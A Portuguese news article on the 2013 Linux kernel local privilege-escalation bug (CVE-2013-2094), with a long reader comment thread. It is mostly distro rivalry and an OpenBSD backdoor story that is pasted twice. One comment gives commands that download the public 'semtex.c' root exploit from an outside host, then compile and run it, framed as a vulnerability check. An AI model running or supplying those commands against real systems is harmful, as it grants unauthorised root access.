Kernel Linux com falhas graves de segurança
Exploit permite que qualquer utilizador tenha privilégios de root
A tecnologia evolui rapidamente e são raros os sistemas que garantem uma fiabilidade/segurança próxima dos 100%. Todos os dias ouvimos falar de vulnerabilidades/bugs em sistemas que, de certa forma, fazem parte do ciclo da programação e melhoria do próprio sistema.
Desta vez, o “lado negro” dos sistemas veio bater à porta do Kernel Linux que apresenta falhas graves de segurança ao nível da shell.
Segundo informações publicadas no Site Ostatic, o Kernel Linux sofre actualmente de graves problemas de segurança, presentes na shell e é hora dos utilizadores/administradores de sistemas tomarem algumas medidas urgentes. A vulnerabilidade/bug encontra-se nos sistemas Linux que correm as versões do kernel entre 2.6.37 até 3.8.8 (ou o RHEL 6 ou algum clone) e permite que qualquer utilizador criado no sistema tenha privilégios de root, recorrendo para isso a um exploit.
Log in as a normal user, compile 100 or so lines of C code, run the executable and you’ve got a root shell. Scary stuff if you manage public shell accounts.
Numa informação publicada pela Red Hat Bugzilla , estão disponíveis um conjunto de interessantes medidas, que ajudam a minimizar tal problema. Ao que consta, tal bug já existe desde 2010 (segundo informações do timestamp do exploit) o que nos leva a pensar quantas máquinas não terão sido atacadas por tal vulnerabilidade. O Pplware continuará atento a esta situação e informará logo que disponha de nova informação.
[Actualização] - kernel 3.8.10 já corrige o problema. Mais informações sobre a vulnerabilidade aqui CVE-2013-2094
Este artigo tem mais de um ano
Lol.. finalmente..
Eu tinha conhecimento deste bug por acaso, o Linux é demasiado livre, que se descobre buracos de segurança facilmente, custa-me acreditar que passado tantos anos, so viram este bug agora.
José este é um bug extremamente obscuro, alias tão obscuro que só agora é que conseguiram criar o exploit que da acesso root ao sistema. Para funcionar tens de ter na mesma acesso ao sistema através de uma conta de utilizador “normal”. Alem disso nem todos os kernels (nestas versões) são vulneráveis, algumas condições são necessárias para isto se verificar. Mais info aqui: https://news.ycombinator.com/item?id=5703758
Mas sim a falha e grave e agora é que se pode tornar problemática se alguns admins não actualizarem os kernels nas suas maquinas, e hackers começarem a tirar partido disso.
Pois, o alerta é importante até porque parece-nos que esta informação tem passado despercebida. Nesse sentido, o Pplware decidiu reforçar o alerta
Qualquer hacker já sabia desta falha a algum tempo, so vai abrir as portas aos newbies.
Esta falha foi tornada publica em 13 de Abril 2013.
Aquando do anuncio saiu ao mesmo o patch de correcção. http://marc.info/?l=linux-kernel&m=136588264507457
O programa em c que permite explorar esta falha foi publicado em 14 de Maio 2013
és um ganda hacker
São sempre necessárias condições para que qualquer exploração de uma vulnerabilidade ocorra, independentemente do sistema operativo, etc.
Testei o programa no Arch e não funciona (kernel 3.9.2). Pelos vistos foi corrigido a partir do kernel 3.8.10.
Sei que ja foi corrigido tb no Debian Wheezy (security)
Viva, DEBIAN!
🙂
Sim, está corrigido nos >3.8.x.
E Arch FTW
Viva Arch!!
a melhor coisa que fiz foi mudar do ubuntu para o Arch Linux
🙂
Infelizmente, eu também mudaria, se não tivesse problemas com a BCM4313. |:
Acho o Arch o melhor lado do Linux 😀
O meu portátil tambem tem essa placa bcm4313. No Debian wheezy o driver wl (conhecido como broadcom-sta) produz “kernel panic”. A solução passou por instalar como alternativa o driver brcm80211.
No meu portátil que também tem essa placa o debian wheezy dá “kernel panic” se instalar o driver wl (broadcom-sta). A solução foi instalar o driver brcm80211 que também suporta essa placa. Agora funciona na perfeição.
Olha Brother, uso o Fedora 18, com o Kernel 3.9.200 no meu mini netbook, e aqui funfa legal essa placa, fiz a atualização para 3.9.201 até a 3.9.400 e nestas versões a placa parou de funcionar, aí retornei ao kernel 3.9.200.
Pessoal, o Arch é maravilhoso sim, mais na minha opinião são dois e os únicos a serem o melhor lado do Linux o Arch e o Fedora, por serem super atuais e por serem sem Bugs rídiculos como o Ubuntu. Nossa! O Buguntu ou, Infernubuntu é muito Bugado, se instala um programa que dá erro, se retirar o programa permanece o erro. É bugado demais.
No Fedora e no Arch você vive power.
Pow rodo no meu netzinho o Fedora, mais três maquinas virtuais ao mesmo tempo e ouvindo musica online no groovershark.com não largo mais o Fedora por nada, e o Arch também é o mesmo nível.
Lógico que tirei o gdm e coloquei o lxdm e gnome pelo openbox. Mas essa mesma configuração no ubuntu, já fiz e era bug todo dia, quase fui para o slack.
Bom retirando esta parte do desempenho! O que vocês tem a me dizer sobre esses vendidos do OpenBSD, quanto a polêmica do ipsec, no linux mantém-se a backdoor, será… A notícia é esta:
…
Como a implementação do IPSEC do OpenBSD foi uma das primeiras a estar livremente disponível, grandes trechos de seu código podem estar presentes em outros projetos, o que faz a relevância dessa notícia alcançar um público bem mais amplo do que os desenvolvedores e usuários do OpenBSD.
IPSEC é um método de criptografia e autenticação aplicado diretamente aos pacotes IP, e a implementação do OpenBSD tem sido considerada estável e robusta – inclusive por ser recomendada pelo próprio FBI para uso em VPNs e firewalls…
O resumo da novidade é o seguinte: um desenvolvedor cujo NDA (acordo de sigilo) de 10 anos com o FBI recentemente expirou mandou um e-mail para o fundador do OpenBSD informando ter conhecimento de que, durante o início do desenvolvimento do IPSEC do OpenBSD, um conjunto de outros desenvolvedores (cujo líder foi identificado na mensagem) foi pago pelo FBI para incluir backdoors na implementação.
Quando se trata de criptografia, backdoors não necessariamente são do tipo encontrado em serviços de conectividade – pode ser um enfraquecimento intencional dos algoritmos empregados, oferecendo a quem tenha conhecimento deste fato um atalho (por exemplo, na temporização, no conteúdo dos paddings, etc.) para facilitar identificar as chaves ou simplesmente decifrar as mensagens. Colocá-los e encontrá-los pode exigir um nível de conhecimento matemático cujo suprimento é relativamente escasso, razão pela qual é possível imaginar que um backdoor de 10 anos ainda possa estar presente em algumas implementações e ninguém notou.
A mensagem sugere ainda que ter encontrado este backdoor foi o verdadeiro motivo pelo qual o Departamento de Defesa dos EUA cancelou seu apoio financeiro ao OpenBSD em 2003.
A mensagem chegou em particular ao fundador do OpenBSD, mas ele decidiu torná-la pública para que todos os interessados possam tomar as ações apropriadas (incluindo a auditoria de códigos, naturalmente), e que os acusados possam apresentar suas defesas.
Trecho da cobertura do OSNews e comentário enviado pelo leitor Bremm (bremmΘmailinator·com):
“Traduzindo o trecho inicial da notícia do OSNews: “Bem, estas são potencialmente grandes novidades que realmente necessitam toda exposição possível. Theo de Raadt (do OpenBSD) recebeu um e-mail cujo conteúdo revelou a ele que há dez anos o FBI pagou diversos desenvolvedores de software de código aberto para implementar diversos backdoors ocultos na pilha IPSEC do OpenBSD. De Raadt decidiu então publicar o e-mail para todos o verem, de forma que a questão do código possa ser revisada.”
Depois de Julian Assange, parece que muita gente resolveu colocar “a boca no trombone” e expor todas as falcatruas dos governos que se auto-intitulam “respeitadores da liberdade” e “democráticos”.” [referência: osnews.com]
Fiz essa mesma decisão e não me arrependo mesmo nada.
Eu li num outro blog sobre linux que este problema já tinha sido resolvido e que era recomendado a sua actualização através dos repositórios do sistema. Por isso não sei se a informação apresentada neste artigo se encontra actualizada.
Não tenho a certeza se já foi ou não lançado nos repositórios dos updates.
Acabei de testar num servidor meu, com Ubuntu Kernel 3.2.0-43 generic.
E não funciona.
Para isto temos que estar logados na máquina. O ataque não é assim tão simples. E sim, já é conhecido.
A malta da Apple é que vai gostar de ler esta noticia 😀
Vai gostar? Não se podem rir muito. Alias, ninguém de pode rir.
Ainda não se percebeu se foi ao nível local, mais parece que sim, mas houve algo de errado:
http://www.f-secure.com/weblog/archives/00002554.html
Estou a tentar perceber algo mais, mas ninguém de pode rir muito.
Eu posso 😀
O post que te pedi?
Acho incrivel como e que no pplware nao publicam a noticia do Google App Engine agora disponivel para PHP enfim :/
… sugestão …
Fazes o artigo, depois no fundo da páginas ondes diz contactos envias o artigo. 😛
Para os outros fazerem dinheiro com os nossos artigos… Ya right.
@Zacarias,
Aquilo que o Pplware faz é serviço publico gratuito. Nunca te pedimos um cêntimos por aquilo que publicamos aqui…ou já? …e olha que as propinas estão caras…
Zacarias, quanto deste de entrada para estares aqui? 😀
Quanto pagaste pelos dispositivos que tenho aqui em cima da minha mesa? E olha que dava para pagar as propinas de um engenheiro!!!!
De que te queixas tu?
Tens o meu mail? Espero um post teu também.
Sejam moderados, sejam boa gente 😉
Ninguém trabalha de graça.
Como tal envio artigos se pagares, e bem 😀
Assim como vocês também não fazem isto de graça, nem ficam a perder ao fim do mês, escusam fazer de coitadinhos 🙂
Nós estamos habituados a primeiro lutar pela qualidade e depois obter os resultados disso. Não temos por hábito pagar, o que fazemos é distribuir. 😉
Já vi que não resultas cá dentro.
Obrigado à mesma. Abraço.
A ultima vez que mandei para la um email ninguém me respondeu … 😀
E ainda é experimental e limitado.
eh eh eh, pois, nao conseguimos estar em todo o lado 🙂 Os nossos enviados especiais estão todos ocupados 🙂
Nuno força, avança e publicamos com o teu nome.
Tens o meu mail?
Não na tenho, e nem sei bem como se publica um artigo lol 🙂
Bem, também me apeteceu brincar 😉
Debian testing (3.2.0.4) – Segfault
Ubuntu 12.04 (3.2.0.4) – Segfault
CentOS 6 (2.6.32) – Não dá shell de root, mas reinicia o servidor sem ficar qualquer registo do que o provocou nos logs (o que não tem piada nenhuma também)
Boas,
Como se costuma dizer ‘Patch you sh1t!’
Para quem tem o sistema actualizado… É uma falha ‘grave’ já corrigida…
Fiz a instalacao do Mageia 3 e quando re-inicio o pc na segunda opcao de seguranca,entra no sistema automaticamente como root. o.O
É um facto. É mesmo assim. No Mageia e em qualquer distro que tenha essa opção AFAIK.
Mas não é bem “segurança” o nome correcto. A tradução de “failsafe” deveria ser qualquer coisa como “tolerante a falhas”.
Onde posso descarregar o exploit
Tenho muitas maquinas com Linux e gostaria de testar a ver se estao vulneraveis
Tens aqui.
http://packetstormsecurity.com/files/121616/Linux-PERF_EVENTS-Local-Root.html
Esta no link que meti mais em cima.
wget http://fucksheep.org/~sd/warez/semtex.c
gcc -O2 semtex.c
./a.out
Se ficares com uma root shell estás vulneravel. Senão aparecer nada ou der segmentation fault não tem problema.
Viva as milhentes distribuições linux com as mais recentes paneleirices instaladas e não devidamente testadas. Tal prática até já chegou ao kernel! Muito feio! Com o meu Debian nunca tive problemas desses. É pouco actualizado, demora a sair uma versão estável, mas quando sai, está mais do que testado. Quando muito podem surgir pequenas falhas, mas nunca como estas. Turubuntutus… Mintroll’s… Susies… a lista de lixo não cabia aqui.
Viva, DEBIAN!
🙂
95% dos utilizadores de computadores usam o Windows que está cheio de milhentos vírus, exploits, adwares, malwares e, já agora, de pplwares 🙂 E esses amigalhaços todos permanecem durante anos nos computadores e ninguém diz nada!
Mas quando aparece qualquer coisinha no Linux, entra tudo em pânico! 🙂 Não desesperem… no Linux há sempre solução e ela vem sempre muito rápidamente! 🙂
Bingo !!
Não viste nas noticias? Milhares de computadores com Linux apanharam vírus por causa desta falha… Milhares de pessoas que usavam a Net para tratar de assuntos do Banco ficaram sem dinheiro lá, tudo por causa desta falha… E mais, milhares de computadores deixaram de trabalhar como deve de ser por causa desta falha…
Ups, peço desculpa, pensei que tinha voltado atrás no tempo e ainda estava a usar Janelas…Damn..
Tudo a funcionar muito bem nos meus pc’s com Windows XP e 7
parabéns, no meu linux também tudo a funcionar bem , digo meu porque mudo sistema como quero e me apetece .
Diz-me o teu IP para eu escrever “Olá” no teu monitor! LOL.
diz-me o teu antes LOL , pois não este problema que por aqui se fala .
Windows sempre será os sistema que mais se pode confiar , o linux não de confiança toda gente mexe nele , ainda bem que utilizo o windows .
Anedota do dia, foi boa…Mas hoje não é sexta!
Boa piada sta kkkkkkkkkkk, RUWINDOWS nunca mais
Um pouco offtopic mas algum expert em Linux me diz como instalar ubuntu (ou outra distro) em ingles mas com location em PT ??? O Ubuntu se escolhemos a lingua inglesa e os pais portugal diz que não existe nenhuma location com essa combinação e só deixa escolher locations inglesas. No Windows isto é básico de se fazer.
Não consigo perceber a tua lógica, ter o sistema em inglês e location em pt? Afinal o que é o location, não é a tradução das mensagens de sistema etc?
Qual é a vantagem de fazeres isso?
É teres tudo em inglês, excepto por exemplo o simbolo monetário $ vs €, formato dos números, etc…
A vantagem é ter o sistema em inglês e evitar traduções mais ou menos manhosas de termos técnicos. Nos servidores windows é muito fácil, instala-se em inglês e mudasse a localização para portugal (datas, moeda, numeração etc). A localização é importante não só para isso mas também para programas que lêem a nossa localização. Por isso acabo sempre com o Linux todo Português porque a alternativa é muito pior.
Vai depender de distro para distro, mas basicamente instala tudo em ingles e depois só tens que alterar as variáveis LC_* que necessitares (MESSAGES, MONETARY, NUMBERS, etc).
Algumas já podes fazer isso durante a instalação, outras, só depois de instalado.
Exploits frescos é…
http://www.exploit-db.com
Mais importante que o sistema é quem o administra. Se se faz uma gestão ativa do sistema vigiando e corrigindo erros, colmatando e pesquisando eventuais falhas de segurança, vigiando e monotorizando tudo o que passa.Muita malta pensa que por ter um Linux está blindado a tudo e nada é mais falso. Um sistema Windows pode ser muito seguro e existem muitos sistemas em instituições muito críticas do ponto de vista da segurança que funcionam muito bem. Os sistemas Unix e Linux gozam de uma fama de infalibilidade mas podem ser muito inseguros se mal administrados. Pela minha experiência, é mais fácil administrar um sistema windows do que um sistema linux sob vários pontos de vista, sendo que um sistema Linux bem administrado, por alguém que realmente domine a coisa é de facto muito seguro. Mas um bom sys admin de Linux não se faz do dia para a noite, a curva de aprendizagem é mais exigente e complexa do que em sistemas Windows. Para além do mais, em sistemas críticos, devem-se usar versões profissionais (clones Unix ou RHEL, Suse). Unbuntu server e Centos fora de questão.
Nada no Ubuntu 13.04 (3.8.0-21-generic).
output:
a.out: semtex.c:51: sheep: Assertion `!close(fd)’ failed.
Aborted (core dumped)
Diferença para um local “root” exploit em Windows:
http://www.theverge.com/2013/5/23/4358400/google-engineer-bashes-microsoft-discloses-windows-flaw
Microsoft: “Ainda estão a investigar”
Linux: “Fixed”
Só para acrescentar, o código “responsável” por este exploit, tem 20 anos 😛 (vem do NT)
Nada no Pclinuxos Br lxde
Uma pergunta leiga… Como saber qual é o kernel do meu pclinuxos lxde??
Abre o terminal e escreve : uname -a
Este é apenas um dos comandos que podes usar.
Olha Brother, uso o Fedora 18, com o Kernel 3.9.200 no meu mini netbook, e aqui funfa legal essa placa, fiz a atualização para 3.9.201 até a 3.9.400 e nestas versões a placa parou de funcionar, aí retornei ao kernel 3.9.200.
Pessoal, o Arch é maravilhoso sim, mais na minha opinião são dois e os únicos a serem o melhor lado do Linux o Arch e o Fedora, por serem super atuais e por serem sem Bugs rídiculos como o Ubuntu. Nossa! O Buguntu ou, Infernubuntu é muito Bugado, se instala um programa que dá erro, se retirar o programa permanece o erro. É bugado demais.
No Fedora e no Arch você vive power.
Pow rodo no meu netzinho o Fedora, mais três maquinas virtuais ao mesmo tempo e ouvindo musica online no groovershark.com não largo mais o Fedora por nada, e o Arch também é o mesmo nível.
Lógico que tirei o gdm e coloquei o lxdm e gnome pelo openbox. Mas essa mesma configuração no ubuntu, já fiz e era bug todo dia, quase fui para o slack.
Bom retirando esta parte! O que vocês tem a me dizer sobre esses vendidos do OpenBSD, quanto a polêmica do ipsec, no linux mantém-se a backdoor, será… A notícia é esta:
…
Como a implementação do IPSEC do OpenBSD foi uma das primeiras a estar livremente disponível, grandes trechos de seu código podem estar presentes em outros projetos, o que faz a relevância dessa notícia alcançar um público bem mais amplo do que os desenvolvedores e usuários do OpenBSD.
IPSEC é um método de criptografia e autenticação aplicado diretamente aos pacotes IP, e a implementação do OpenBSD tem sido considerada estável e robusta – inclusive por ser recomendada pelo próprio FBI para uso em VPNs e firewalls…
O resumo da novidade é o seguinte: um desenvolvedor cujo NDA (acordo de sigilo) de 10 anos com o FBI recentemente expirou mandou um e-mail para o fundador do OpenBSD informando ter conhecimento de que, durante o início do desenvolvimento do IPSEC do OpenBSD, um conjunto de outros desenvolvedores (cujo líder foi identificado na mensagem) foi pago pelo FBI para incluir backdoors na implementação.
Quando se trata de criptografia, backdoors não necessariamente são do tipo encontrado em serviços de conectividade – pode ser um enfraquecimento intencional dos algoritmos empregados, oferecendo a quem tenha conhecimento deste fato um atalho (por exemplo, na temporização, no conteúdo dos paddings, etc.) para facilitar identificar as chaves ou simplesmente decifrar as mensagens. Colocá-los e encontrá-los pode exigir um nível de conhecimento matemático cujo suprimento é relativamente escasso, razão pela qual é possível imaginar que um backdoor de 10 anos ainda possa estar presente em algumas implementações e ninguém notou.
A mensagem sugere ainda que ter encontrado este backdoor foi o verdadeiro motivo pelo qual o Departamento de Defesa dos EUA cancelou seu apoio financeiro ao OpenBSD em 2003.
A mensagem chegou em particular ao fundador do OpenBSD, mas ele decidiu torná-la pública para que todos os interessados possam tomar as ações apropriadas (incluindo a auditoria de códigos, naturalmente), e que os acusados possam apresentar suas defesas.
Trecho da cobertura do OSNews e comentário enviado pelo leitor Bremm (bremmΘmailinator·com):
“Traduzindo o trecho inicial da notícia do OSNews: “Bem, estas são potencialmente grandes novidades que realmente necessitam toda exposição possível. Theo de Raadt (do OpenBSD) recebeu um e-mail cujo conteúdo revelou a ele que há dez anos o FBI pagou diversos desenvolvedores de software de código aberto para implementar diversos backdoors ocultos na pilha IPSEC do OpenBSD. De Raadt decidiu então publicar o e-mail para todos o verem, de forma que a questão do código possa ser revisada.”
Depois de Julian Assange, parece que muita gente resolveu colocar “a boca no trombone” e expor todas as falcatruas dos governos que se auto-intitulam “respeitadores da liberdade” e “democráticos”.” [referência: osnews.com]